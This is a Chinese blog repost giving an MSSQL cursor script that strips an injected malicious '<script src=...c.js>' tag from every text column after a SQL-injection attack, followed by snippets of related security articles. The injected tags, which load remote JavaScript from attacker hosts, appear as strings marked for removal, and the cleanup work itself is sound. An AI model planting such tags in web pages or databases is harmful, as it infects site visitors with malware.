网站数据库被SQL注入后清除script恶意病毒代码的方法

最新推荐文章于 2023-09-28 00:24:20 发布
最新推荐文章于 2023-09-28 00:24:20 发布
阅读量144 收藏
点赞数
文章标签: 数据库
原文链接:http://www.cnblogs.com/opper/archive/2010/01/19/1651973.html
版权

现在,网站流行最广的入侵应该是SQL注入吧,在程序上如果没有做好SQL注入防范,很容易给黑客入侵,如果网站的数据库给入侵注入js等恶意网址代码的话,怎么办呢?本文是其中一种解决方法:
--解决并清除SQL被注入<script>恶意病毒代码的语句
declare @t varchar(255),@c varchar(255) 
declare table_cursor cursor for select a.name,b.name  
from sysobjects a,syscolumns b ,systypes c  
where a.id=b.id and a.xtype='u' and c.name  
in ('char', 'nchar', 'nvarchar', 'varchar','text','ntext') 
declare @str varchar(500),@str2 varchar(500)  
set @str='<script src=http://r01.3322.org/c.js></script>'/*要替换的内容*/ 
set @str2=''  
open table_cursor  
fetch next from table_cursor  
into @t,@c while(@@fetch_status=0)  
begin exec('update ['   @t   '] set ['   @c   ']=replace(cast(['   @c   '] as varchar(8000)),''' @str ''','''  @str2  ''')') 
fetch next from table_cursor  
into @t,@c end close table_cursor deallocate table_cursor;

首先替换代码里面的<script src=http://r01.3322.org/c.js></script>为你的数据库表里面被注入的内容,打开MSSQL的SQL查询分析器执行以下代码就可以了。

转载于:https://www.cnblogs.com/opper/archive/2010/01/19/1651973.html

weixin_30845171
关注
[网络安全提高篇] 一一三.Powershell恶意代码检测 (1)论文总结及抽象语法树(AST)提取
杨秀璋的专栏
03-11 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将详细讲解PowerShell、Powershell恶意代码检测总结及抽象语法树(AST)提取。希望这篇文章对您有帮助,也推荐大家去阅读论文,且看且珍惜。
Web开发常见的几个漏洞解决方法 ---SQL注入
热门推荐
一万年太久 - 只争朝夕
06-12 2万+
平时工作,多数是开发Web项目,由于一般是开发内部使用的业务系统,所以对于安全性一般不是看的很重,基本上由于是内网系统,一般也很少会受到攻击,但有时候一些系统平台,需要外网也要使用,这种情况下,各方面的安全性就要求比较高了,所以往往会交付给一些专门做安全测试的第三方机构进行测试,然后根据反馈的漏洞进行修复,如果你平常对于一些安全漏洞不够了解,那么反馈的结果往往是很残酷的,迫使你必须在很多细节上进行
sqlserver防sql注入病毒代码.rar
05-13
里面有批量清除sqlserver的病毒的代码的text文本文件,放在查询分析器执行,另一个是防sql注入的代码文件. 还有图片教程对sql企业管理器的用户权限设置, 让sql注入彻底消失.
mysql 注入病毒_清除SQL被注入恶意病毒代码的语句
weixin_42360905的博客
01-20 292
在SQL查询分析器执行以下代码就可以了。 复制代码 代码如下: declare @t varchar(255),@c varchar(255) declare table_cursor cursor for select a.name,b.name from sysobjects a,syscolumns b ,systypes c where a.id=b.id and a.xtype='u' ...
网站注入SQL攻击防护办法
网站安全专家
02-04 516
能否理解并利用SQL首注是区分一般攻击者和专业攻击者的一个标准。面对严密禁用详细错误消息的防御,大多数新手会转向下一目标。但攻破SQL盲注漏洞并非绝无可能,我们可借助很多技术。它们允许攻击者利用时间、响应和非主流通道(比如DNS)来提取数据。以SQL查询方式提问一个返回TRUE或FALSE的简单问题并重复进行上千次,数据库王国的大门便通常不容易发现SQL盲注漏洞的原因是它们隐藏在暗处。一旦发现漏洞后,我们就会有们能支持多种多样的数据库。大量的漏洞可用。要明确什么时候应选择基于响应而非时间的利用和什么时候使用
数据库注入脚本后,数据库恢复办法,<script src=http://3b3.org/c.js></script>
weixin_30737363的博客
07-29 83
declare @t varchar(555),@c varchar(555) ,@inScript varchar(8000) set @inScript='<script src=http://3b3.org/c.js></script>'declare table_cursor cursor for select a.name,b.name from sysobje...
清除注入的js代码
lyg的专栏
03-30 696
<br />declare   @delStr   nvarchar(500)   <br />set   @delStr= '<script src=http://3b3.org/c.js></script>' <br />set   nocount   on <br />declare   @tableName   nvarchar(100),@columnName   nvarchar(100),@tbID   int,@iRow   int,@iResult   int   <br />declar
mysql 注入病毒_清除SQL被注入恶意病毒代码的语句_mysql
weixin_33181210的博客
01-20 215
01.declare @t varchar(255),@c varchar(255)02.declare table_cursor cursor for select a.name,b.name03.from sysobjects a,syscolumns b ,systypes chttp://www.gaodaima.com/39869.html清除SQL被注入恶意病毒代码的语句_mysql0...
解析:清除SQL被注入恶意病毒代码的语句
09-10
SQL注入是一种常见的网络...总之,清除SQL注入恶意病毒代码是一项重要的安全任务,但更关键的是采取预防措施,确保应用程序的安全性。通过理解SQL注入的原理,结合有效的防御策略,可以显著降低数据库被攻击的风险。
SQL注入、XSS、XXE、CSRF、SSRF、越权漏洞、文件上传、文件包含总结篇
m0_57379855的博客
03-23 5790
漏洞总结篇SQL注入修复过滤特殊字符修改php.in使用mysqli_real_escape_string()函数加固数据库方面加固管理方面 SQL注入 是指web应用程序对用户输入的数据的合法性没有判断或者没有严格的过滤,攻击者可以在web程序把定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息 就是使用某种手段,在原来的SQL语句基础上,添加一段恶意的SQL语句并执行,从而达到不被管理员允许的目
MSSQL木马修复,木马后的处理方法
09-10
木马通常通过恶意SQL注入、不安全的网络连接、漏洞利用等方式进入MSSQL数据库。它们可能篡改数据、执行恶意代码、创建后门或者盗取敏感信息。针对这些威胁,我们需要采取以下步骤进行修复和防护: 1. **检测木马**...
MSSQL数据库被插入JS/sql注入挂马的解决方法
bluehcy的专栏
01-29 893
MSSQL数据库被插入JS/sql注入挂马的解决方法黑客先从搜索引擎google、百度等搜索存在漏洞的采用asp+mssql设计的网站,然后采用小明子这样的注入扫描工具,扫描整个网站,一旦发现有sql注入的漏洞或者上传漏洞,黑客就通过各种手段,上传自己的大马,如海阳木马;然后,黑客就把这个网站纳入他的肉鸡列表,随时在数据库里加入自己希望加的js代码,而这些代码往往是包含着众多的的病毒、木马,最终让访问受控网站的用户的电脑毒。      虽然,可以通过sql查询分析器执行批量代换,暂时解决被插入的js代码问
批量清除SQL Server注入恶意代码
最新发布
DiAngular的博客
09-28 165
总结起来,通过使用类似上述示例的SQL查询,你可以批量删除SQL Server数据库注入恶意代码。在SQL Server,防止和清除注入恶意代码是非常重要的。要批量删除多个表恶意代码,我们可以使用循环或动态SQL来处理每个表。以下是一个示例,演示如何使用游标和动态SQL来批量删除多个表恶意代码。请注意,删除恶意代码可能会对数据库的完整性产生影响,因此在执行这些操作之前,务必备份数据库以防万一。以下是一个示例,演示如何使用SQL查询来批量删除包含恶意代码的字符串。
SQL数据库防范恶意代码注入的批量替换技术
这种方法可以帮助数据库管理员清除数据库已经被注入恶意代码。通过编写特定的SQL脚本,管理员可以查找特定的字符串模式,并将其替换为安全的值或代码。 知识点四:防御SQL注入攻击 防御SQL注入攻击的方法有多种...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值